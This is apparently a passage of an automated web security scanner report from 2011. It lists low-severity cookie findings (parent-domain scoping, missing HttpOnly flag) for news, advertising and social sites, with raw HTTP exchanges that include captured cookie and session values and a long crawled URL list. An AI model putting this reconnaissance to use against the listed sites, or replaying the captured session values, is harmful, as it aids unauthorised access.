The following cookie was issued by the application and is scoped to a parent of the issuing domain:

WHDHSTR=10276375ee09de38c9ed3d9e2f331510; expires=Thu, 26-Jan-2012 00:10:25 GMT; path=/; domain=.whdh.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /mobile/phoneforecast/settings.php HTTP/1.1
Host: www3.whdh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:10:25 GMT
Server: Apache/2.0.46 (Red Hat)
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Set-Cookie: WHDHSTR=10276375ee09de38c9ed3d9e2f331510; expires=Thu, 26-Jan-2012 00:10:25 GMT; path=/; domain=.whdh.com
Set-Cookie: PHPSESSID=b403bd4dcacdf2dc04e785e91ecaa8a7; path=/
Expires: Wed, 26 Jan 2011 00:10:25 GMT
Cache-Control: max-age=86400, must-revalidate
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 10202

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>Mobile Alerts - Daily Phone Forecast Account Settings</title>
<meta name="publisher"
...[SNIP]...

13.238. http://xads.zedo.com/ads3/a previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://xads.zedo.com
Path:	/ads3/a

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

FFgeo=5386156; path=/; EXPIRES=Wed, 25-Jan-12 00:11:14 GMT; DOMAIN=.zedo.com
ZEDOIDA=jgHX0goAACQAAH@dLJYAAAKY~012511; path=/; expires=Fri, 22-Jan-21 00:11:14 GMT; domain=.zedo.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ads3/a HTTP/1.1
Host: xads.zedo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:11:14 GMT
Server: ZEDO 3G
Set-Cookie: FFgeo=5386156; path=/; EXPIRES=Wed, 25-Jan-12 00:11:14 GMT; DOMAIN=.zedo.com
Set-Cookie: ZEDOIDA=jgHX0goAACQAAH@dLJYAAAKY~012511; path=/; expires=Fri, 22-Jan-21 00:11:14 GMT; domain=.zedo.com
Expires: -1
Pragma: no-cache
Cache-Control: no-cache
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Vary: Accept-Encoding
Content-Length: 266
Connection: close
Content-Type: text/html

<HTML><HEAD></HEAD><BODY><a href='http://c1.zedo.com/ads3/c?a=0;x=0;g=172,0;c=0,0;i=19;n=0;w=47;m=82;s=0;z=42306355;k=http://www.zedo.com'TARGET='_blank'><img src='http://c1.zedo.com/OzoDB/0/0/0/blank
...[SNIP]...

13.239. http://xfactor.tweetmeme.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://xfactor.tweetmeme.com
Path:	/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

tm_identity=a4d8db2993601638d04abd7579c4807a; expires=Tue, 01-Feb-2011 04:40:45 GMT; path=/; domain=.tweetmeme.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: xfactor.tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 04:40:45 GMT
Content-Type: text/html
Connection: close
Set-Cookie: tm_identity=a4d8db2993601638d04abd7579c4807a; expires=Tue, 01-Feb-2011 04:40:45 GMT; path=/; domain=.tweetmeme.com
X-Ads-Served-In: 0.0037000179290771
X-Served-In: 0.97312808036804
X-Served-By: h03
Content-Length: 42682

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<title
...[SNIP]...

13.240. http://yoga.tweetmeme.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://yoga.tweetmeme.com
Path:	/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

tm_identity=dc2ca952c1c37e52f76eb77141d10a94; expires=Tue, 01-Feb-2011 04:40:54 GMT; path=/; domain=.tweetmeme.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: yoga.tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 04:40:54 GMT
Content-Type: text/html
Connection: close
Set-Cookie: tm_identity=dc2ca952c1c37e52f76eb77141d10a94; expires=Tue, 01-Feb-2011 04:40:54 GMT; path=/; domain=.tweetmeme.com
X-Ads-Served-In: 0.004396915435791
X-Served-In: 0.036845922470093
X-Served-By: ded2059
Content-Length: 40246

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<title
...[SNIP]...

13.241. http://youtube.tweetmeme.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://youtube.tweetmeme.com
Path:	/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

tm_identity=94b6566617ce940cd794bf1274e16135; expires=Tue, 01-Feb-2011 04:41:00 GMT; path=/; domain=.tweetmeme.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: youtube.tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 04:41:00 GMT
Content-Type: text/html
Connection: close
Set-Cookie: tm_identity=94b6566617ce940cd794bf1274e16135; expires=Tue, 01-Feb-2011 04:41:00 GMT; path=/; domain=.tweetmeme.com
X-Ads-Served-In: 0.0044999122619629
X-Served-In: 0.045840978622437
X-Served-By: h01
Content-Length: 40368

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<title
...[SNIP]...

14. Cookie without HttpOnly flag set previous next
There are 942 instances of this issue:

http://7newsboston.disqus.com/thread/whdh_tv_commuter_rail_service_updates_for_jan_24_22/
https://acc.newsguy.com/a/memsubmit.asp
http://advertising.aol.com/privacy/advertisingcom/opt-out
http://affiliate.kickapps.com/service/getWidget.kickAction
https://billing.cloudaccess.net/cart.php
http://cdn.beirut.com/GetImage.php
https://cloudaccess.infusionsoft.com/AddForms/processFormSecure.jsp
http://community.parenthood.com/feed/get/type/rss/source/domain/id/40337
http://community.parenthood.com/kickapps/service/getWidgetSwf.kickAction
http://community.parenthood.com/service/searchEverythingAsRss.kickAction
http://dev.piwik.org/trac/browser/trunk/js/piwik.js
http://disqus.com/logout/
http://fastdial.com/
http://help.tweetmeme.com/
http://help.tweetmeme.com/2009/04/07/api-documentation/
http://help.tweetmeme.com/2009/04/09/rss-feeds/
http://help.tweetmeme.com/2009/04/09/twitter-feeds/
http://help.tweetmeme.com/contact/
http://help.tweetmeme.com/faq
http://help.tweetmeme.com/language/
http://investor.autobytel.com/
http://justintadlock.com/
http://justintadlock.com/archives/2008/04/13/cleaner-wordpress-gallery-plugin
http://kickapps.yuku.com/kickapps/service/getWidget.kickAction
http://lesterchan.net/
http://mad4milk.net/
http://netvouz.com/action/submitBookmark
http://news.cnet.com/
http://newsguy.com/
http://newsguy.com/accountbandwidth.htm
http://newsguy.com/accountemail.htm
http://newsguy.com/affiliate.htm
http://newsguy.com/allinone.htm
http://newsguy.com/birthday.htm
http://newsguy.com/bonusbytes.htm
http://newsguy.com/cellphone.htm
http://newsguy.com/commd6.htm
http://newsguy.com/contact.htm
http://newsguy.com/copy.htm
http://newsguy.com/diagnostics.htm
http://newsguy.com/email.htm
http://newsguy.com/groups.htm
http://newsguy.com/ispcon.htm
http://newsguy.com/javascript:LoginNow()
http://newsguy.com/members.htm
http://newsguy.com/msgpanel/message.asp
http://newsguy.com/news.asp
http://newsguy.com/news.htm
http://newsguy.com/newsguys.htm
http://newsguy.com/overview.htm
http://newsguy.com/policy.htm
http://newsguy.com/services.htm
http://newsguy.com/teraton_features.htm
http://newsguy.com/user_info.asp
http://sonspring.com/journal/clearing-floats
http://sourceforge.net/softwaremap/
http://starscene.dailystar.com.lb/music-scene/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
http://t.mookie1.com/t/v1/imp
http://tenzing.fmpub.net/
http://themehybrid.com/themes/shadow
http://thenextweb.com/
http://tweetmeme.com/auth/login
http://twitter.com/
http://twitter.com/7News/
http://twitter.com/7News/newsteam
http://twitter.com/7News/status/29619600551317504
http://twitter.com/7news
http://twitter.com/Ihtirametna/status/12955399590252544/x22
http://twitter.com/LizPW/
http://twitter.com/LizPW/status/29620929206165504
http://twitter.com/amazon/x22
http://twitter.com/cw56
http://twitter.com/datasift
http://twitter.com/friendships/show.json
http://twitter.com/goodies/tweetbutton
http://twitter.com/joomla
http://twitter.com/kontentdesign
http://twitter.com/nbc/primetime
http://twitter.com/netlingo
http://twitter.com/nickhalstead/status/15837113167
http://twitter.com/share
http://twitter.com/spies_assassins
http://twitter.com/tweetmeme
http://twitter.com/typekit
http://twitter.com/ups
http://whdhstore.hipcricket.com/
http://www.123movers.com/
http://www.amazon.com/
http://www.amazon.com/Kindle-Wireless-Reader-Wifi-Graphite/dp/B002Y27P3M/x22
http://www.amazon.com/Kindle-Wireless-Reading-Device-Display/dp/B0015T963C/x22
http://www.amazon.com/b/
http://www.amazon.com/books-used-books-textbooks/b
http://www.amazon.com/dp/0313363153
http://www.amazon.com/dp/0814410960
http://www.amazon.com/dp/B000EFAO1G
http://www.amazon.com/dp/B001AIM6V2
http://www.amazon.com/dp/B0037UT1LY
http://www.amazon.com/dvds-used-hd-action-comedy-oscar/b
http://www.amazon.com/gp/css/homepage.html/x22
http://www.amazon.com/gp/gc/x22
http://www.amazon.com/gp/product/0596804946
http://www.amazon.com/gp/site-directory/x22
http://www.amazon.com/music-rock-classical-pop-jazz/b
http://www.amazon.com/toys/b
http://www.amazon.com/wishlist/x22
http://www.amazon.com/x22
http://www.amazon.com/x22/x3e/x3cli
http://www.americascupmedia.com/index.php
http://www.aspirationtech.org/
http://www.aub.kg/x22
http://www.autocheck.com/
http://www.autotrader.com/
http://www.autotrader.com/ajax/backButtonFix.jsp
http://www.autotrader.com/hornav/trader/index.jsp
http://www.barkerstores.com/soundings/
http://www.beirut.com/
http://www.beneteaucountdown.com/
http://www.benjaminsterling.com/experiments/jqShuffle/
http://www.boats.com/
http://www.careersingear.com/
http://www.carmax.com/
http://www.carsdirect.com/x22
http://www.cdearth.com/photo-image-editor.htm
http://www.corporatehousing.com/
http://www.digitaltips.org/
http://www.diigo.com/post
http://www.directstartv.com/
http://www.dominionenterprises.com/main/do/Privacy_Policy
http://www.dominionenterprises.com/main/do/Terms_of_Use
http://www.dzone.com/links/add.html
http://www.ebayinc.com/content/press_release/ebay_selects_joomla_open_source_to_foste
http://www.experthost.com/
http://www.forrent.com/
http://www.heroturko.org/n/Nonude-Young-and-Beauty-Pretty-Girl-teen-NN-usenet-binaries/x22
http://www.homes.com/
http://www.hotelcoupons.com/
http://www.iloubnan.info/artsandculture/actualite/id/47982/theme/111/titre/Raquel-Boldorini-in-concert-at-AUB-s-Assembly-Hall/x22
https://www.isc.org/software/inn
http://www.linkedin.com/company/805465
http://www.liutilities.com/affcb/
http://www.mathias-bank.de/
http://www.metacafe.com/fplayer/
http://www.mister-wong.com/index.php
http://www.myproductadvisor.com/mpa/autobytel/setCookie.do
http://www.myspace.com/Modules/PostTo/Pages/
http://www.myspace.com/netlingo
http://www.net-folio.net/
http://www.netlingo.com/log-out.php
http://www.netlingo.com/login.php
http://www.netlingo.com/register.php
http://www.netlingo.com/shop/index.php
http://www.netlingo.com/shop/shopping-cart.php
http://www.networkworld.com/community/blog/ebay-use-joomla-open-source-glue
http://www.newsguy.com/charity_chart.htm
http://www.newsguy.com/home_popupstatus.htm
http://www.newsguy.com/overview.htm
http://www.officedepot.com/promo.do
http://www.opensource.org/licenses/bsd-license.php
http://www.opensource.org/licenses/gpl-license.php
http://www.opensource.org/licenses/mit-license.php
http://www.packtpub.com/award
http://www.paperg.com/jsfb/embed.php
http://www.parenthood.com/
http://www.roomsaver.com/
http://www.sea-tec.it/
http://www.senioroutlook.com/
http://www.squidoo.com/lensmaster/bookmark
http://www.t-mobile.com/Company/Community.aspx
http://www.thisnext.com/pick/new/submit/sociable/
http://www.w-w-i.com/
http://www.w-w-i.com/velux_5_oceans_2010_race/
http://www.yachtscoring.com/event_results_cumulative.cfm
http://www3.whdh.com/mobile/phoneforecast/settings.php
http://a.tribalfusion.com/i.cid
https://acc.newsguy.com/user/-/accnt_billing
https://acc.newsguy.com/user/-/accnt_contact
https://acc.newsguy.com/user/-/accnt_flash
https://acc.newsguy.com/user/-/accnt_history
https://acc.newsguy.com/user/-/customer_referrals
https://acc.newsguy.com/user/-/referrals_cashout
https://acc.newsguy.com/user/accnt_overview
https://acc.newsguy.com/user/accnt_renew
https://acc.newsguy.com/user/accnt_settings
https://acc.newsguy.com/user/accnt_signup_usenet
https://acc.newsguy.com/user/accnt_upgrade
http://action.media6degrees.com/orbserv/hbpix
http://ad.doubleclick.net/click
http://ad.masjo.com/www/delivery/ajs.php
http://ad.masjo.com/www/delivery/ck.php
http://ad.masjo.com/www/delivery/lg.php
http://ad.turn.com/server/ads.js
http://ad.yieldmanager.com/pixel
http://ad.yieldmanager.com/unpixel
http://ads.adbrite.com/adserver/behavioral-data/8201
http://ads.dailystar.com.lb/www/delivery/afr.php
http://ads.dailystar.com.lb/www/delivery/ck.php
http://ads.dailystar.com.lb/www/delivery/lg.php
http://ads.doclix.com/adserver/CntImprImg
http://ads.pointroll.com/PortalServe/
http://ads.revsci.net/adserver/ako
http://ads.traderonline.com/RealMedia/ads/adstream_jx.ads/www.traderonline.com/traderonline/1888828924@Right1
http://ads.traderonline.com/RealMedia/ads/adstream_jx.ads/www.traderonline.com/traderonline/1914196089@Right1
http://adserver.adtechus.com/bind
http://adserver.teracent.net/tase/ad
http://adserver.teracent.net/tase/redir/1295921988188_58040565_as2108_imp/vew
http://adserving.autotrader.com/js.ng/adsize=1x1&site=ntl&page=homepagegeosplash
https://adwords.google.com/select/Login
http://affiliate.kickapps.com/crossdomain.xml
http://ak1.abmr.net/is/r1-ads.ace.advertising.com
http://as1.whdh.com/pan/adlog.php
http://as2.whdh.com/m/m.php/1295906131129/m.gif
http://at.amgdgt.com/ads/
http://autotrader.dealix.com/step1.asp
http://b.collective-media.net/seg/cm/de18_1
http://b.scorecardresearch.com/b
http://b.scorecardresearch.com/r
http://b3.mookie1.com/2/DataXuB3/Dominos/11Q1/Opt/120/1[timestamp]@x90
http://backend.parenthood.com/jscripts/p7EPMscripts.js
http://backend.parenthood.com/jscripts/shopblog_style05_master.css
http://backend.parenthood.com/s_code.js
http://bh.contextweb.com/bh/set.aspx
http://bid.openx.net/json
http://bid.openx.net/json
http://bid.openx.net/log
http://blogsearch.google.com/
http://books.google.com/bkshp
http://books.google.com/books
http://bs.serving-sys.com/BurstingPipe/adServer.bs
http://c7.zedo.com/OzoDB/cutils/R52_9/jsc/305/egc.js
http://c7.zedo.com/bar/v16-401/c5/jsc/gl.js
http://cdn.w55c.net/i/0Rw6qcLcmo_34070076.html
http://click.linksynergy.com/fs-bin/click
http://code.google.com/p/swfobject/
http://community.joomla.org/
http://community.joomla.org/showcase/
http://community.joomla.org/showcase/how-to-submit-a-site.html
http://community.joomla.org/showcase/sites-of-the-month.html
http://community.joomla.org/showcase/sites/advsearch.html
http://community.joomla.org/showcase/sites/new.html
http://community.parenthood.com/kickapps/service/getWidgetSwf.kickAction
http://comunidadjoomla.org/component/content/article/109-general-joomla-16x/202-joomla-16-ya-ha-llegado.html
http://cspix.media6degrees.com/orbserv/hbpix
http://d1.openx.org/afr.php
http://d1.openx.org/afr.php
http://d1.openx.org/ajs.php
http://d1.openx.org/lg.php
http://delb.opt.fimserve.com/fimbid/
http://demo.joomla.org/
http://demo16.cloudaccess.net/
http://demo16.cloudaccess.net/administrator/index.php
http://developer.joomla.org/
http://developer.joomla.org/security.html
http://developer.joomla.org/security/news.html
http://dm.de.mookie1.com/2/B3DM/2010DM/1596198292@x23
http://dm.de.mookie1.com/2/B3DM/DLX/11596989115@x92
http://dm.de.mookie1.com/2/B3DM/DLX/@x94
http://dominionenterprises.112.2o7.net/b/ss/deparenthood/1/H.15.1/s24211537942755
http://dominionenterprises.112.2o7.net/b/ss/desoundings/1/H.21/s27710598513465
http://dp.specificclick.net/
http://ds.addthis.com/red/psi/sites/www.abbreviations.com/p.json
http://extensions.joomla.org/
http://extensions.joomla.org/extensions
http://extensions.joomla.org/extensions/advanced-search
http://extensions.joomla.org/extensions/languages/translations-for-joomla
http://extensions.joomla.org/extensions/new
http://flybase.org/reports/FBgn0000146.html/x22
http://forums.freebsd.org/
http://foxaudiencenetwork.122.2o7.net/b/ss/fan-foxaudience/1/H.20.3/s68358821158763
http://gegnia.com/joomla/informacion/mbrriti-joomla-1-pik-6
https://github.com/DataSift/TweetMeme-Chrome-Extension
http://goto.ext.google.com/og-dogfood-issue
http://goto.ext.google.com/og-exp
http://green.autobytel.com/
http://groups.google.com/group/alt.slack/msg/fa1fe1e3e6c31c9b/x22
http://groups.google.com/group/joomla-commits/topics
http://groups.google.com/groups
http://groups.google.com/grphp
http://gsas.harvard.edu/
http://hairmakeup.tweetmeme.com/
http://homepage.mac.com/yukikun/software/slimbox_ex/
http://howto.tweetmeme.com/
http://idpix.media6degrees.com/orbserv/hbpix
http://il.youtube.com/watch
http://images.google.com/images
http://iphone.tweetmeme.com/
http://joomfa.org/joomla-16-persian.html
http://joomla.jp/news/1-projectnews/169-joomla-16-has-arrived.html
http://joomla.pl/powiadomienia/577-joomla-16-wydany.html
http://joomladaywest.com/
http://joomladaywest.com/sponsors
http://joomladaywest.com/the-conference/keynote-speakers
http://joomlaportal.ru/content/view/2239/70/
http://js.revsci.net/gateway/gw.js
http://justinbieber.tweetmeme.com/
http://jxtended.com/
http://k.collective-media.net/cmadj/cm.martini/
http://khm0.google.com/kh/v/x3d76/x26
http://khm1.google.com/kh/v/x3d76/x26
http://khmdb0.google.com/kh
http://khmdb1.google.com/kh
http://kickapps.yuku.com/service/searchEverythingAsRss.kickAction
http://km-kh.com/km/joomla-news/63-joomlar-16-has-arrived.html
http://kontentdesign.com/
http://leadback.advertising.com/adcedge/lb
http://loadus.exelator.com/load/
http://magazine.joomla.org/
https://maps-api-ssl.google.com/maps
http://maps.google.com/maps
http://maps.google.com/maps/place
http://media.fastclick.net/w/pg
http://media.fastclick.net/w/tre
http://media.fastclick.net/w/win.bid
http://metrics.autobytel.com/b/ss/autobytelcorp/1/H.5-pdv-2/s1332017967011
http://metrics.traderonline.com/b/ss/detraderonline/1/H.17/s93964351669419
http://mig.nexac.com/2/B3DM/DLX/1@x96
http://my.joomla.org/
http://network.realmedia.com/RealMedia/ads/adstream_nx.ads/TRACK_Radioshack/Retargeting_Conversionpage_Nonsecure@Bottom3
http://news.webshots.com/photo/1059414821042998563QWNlxQ/x22
http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/NaN/1930644746@Top,x01,x02,x03,x04,x05,Middle,Right1,Right2,Left,Left1,Left2,Left3,Bottom,Bottom1,Bottom2,Bottom3,BottomRight
http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1029279147@Top,Middle,Right,Right1,x01,x02,x03,x04
http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1033534934@Top,Middle,Right,Right1,x01,x02,x03,x04
http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1044316774@Top,Middle,Right,Right1,x01,x02,x03,x04
http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1046826505@Top,Middle,Right,Right1,x01,x02,x03,x04
http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1047418271@Top,Middle,Right,Right1,x01,x02,x03,x04
http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1055977740@Top,Middle,Right,Right1,x01,x02,x03,x04
http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1079026132@Top,Middle,Right,Right1,x01,x02,x03,x04
http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1116487764@Top,Middle,Right,Right1,x01,x02,x03,x04
http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1117083037@Top,Middle,Right,Right1,x01,x02,x03,x04
http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1118187308@Top,Middle,Right,Right1,x01,x02,x03,x04
http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1128492533@Top,Middle,Right,Right1,x01,x02,x03,x04
http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1133836899@Top,Middle,Right,Right1,x01,x02,x03,x04
http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1139218526@Top,Middle,Right,Right1,x01,x02,x03,x04
http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1167274727@Top,Middle,Right,Right1,x01,x02,x03,x04
http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1209535023@Top,Middle,Right,Right1,x01,x02,x03,x04
http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1216110988@Top,Middle,Right,Right1,x01,x02,x03,x04
http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1225562716@Top,Middle,Right,Right1,x01,x02,x03,x04
http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1239081530@Top,Middle,Right,Right1,x01,x02,x03,x04
http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1241424720@Top,Middle,Right,Right1,x01,x02,x03,x04
http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1251933878@Top,Middle,Right,Right1,x01,x02,x03,x04
http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1264761221@Top,Middle,Right,Right1,x01,x02,x03,x04
http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1271414808@Top,Middle,Right,Right1,x01,x02,x03,x04
http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1273853013@Top,Middle,Right,Right1,x01,x02,x03,x04
http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1280349904@Top,Middle,Right,Right1,x01,x02,x03,x04
http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1319458490@Top,Middle,Right,Right1,x01,x02,x03,x04
http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1326693698@Top,Middle,Right,Right1,x01,x02,x03,x04
http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1341529874@Top,Middle,Right,Right1,x01,x02,x03,x04
http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1347161569@Top,Middle,Right,Right1,x01,x02,x03,x04
http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1357663315@Top,Middle,Right,Right1,x01,x02,x03,x04
http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1361342262@Top,Middle,Right,Right1,x01,x02,x03,x04
http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1376047824@Top,Middle,Right,Right1,x01,x02,x03,x04
http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1413816750@Top,Middle,Right,Right1,x01,x02,x03,x04
http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1415276276@Top,Middle,Right,Right1,x01,x02,x03,x04
http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1460402778@Top,Middle,Right,Right1,x01,x02,x03,x04
http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1469263568@Top,Middle,Right,Right1,x01,x02,x03,x04
http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1533426917@Top,Middle,Right,Right1,x01,x02,x03,x04
http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1557625622@Top,Middle,Right,Right1,x01,x02,x03,x04
http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1560905621@Top,Middle,Right,Right1,x01,x02,x03,x04
http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1568995865@Top,Middle,Right,Right1,x01,x02,x03,x04
http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1593404407@Top,Middle,Right,Right1,x01,x02,x03,x04
http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1593605280@Top,Middle,Right,Right1,x01,x02,x03,x04
http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1595740909@Top,Middle,Right,Right1,x01,x02,x03,x04
http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1616048263@Top,Middle,Right,Right1,x01,x02,x03,x04
http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1618634905@Top,Middle,Right,Right1,x01,x02,x03,x04
http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1621737551@Top,Middle,Right,Right1,x01,x02,x03,x04
http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1676341961@Top,Middle,Right,Right1,x01,x02,x03,x04
http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1682116568@Top,Middle,Right,Right1,x01,x02,x03,x04
http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1689149420@Top,Middle,Right,Right1,x01,x02,x03,x04
http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1692074952@Top,Middle,Right,Right1,x01,x02,x03,x04
http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1701891140@Top,Middle,Right,Right1,x01,x02,x03,x04
http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1730151269@Top,Middle,Right,Right1,x01,x02,x03,x04
http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1739497285@Top,Middle,Right,Right1,x01,x02,x03,x04
http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1745603517@Top,Middle,Right,Right1,x01,x02,x03,x04
http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1747984898@Top,Middle,Right,Right1,x01,x02,x03,x04
http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1753370563@Top,Middle,Right,Right1,x01,x02,x03,x04
http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1761257569@Top,Middle,Right,Right1,x01,x02,x03,x04
http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1766138964@Top,Middle,Right,Right1,x01,x02,x03,x04
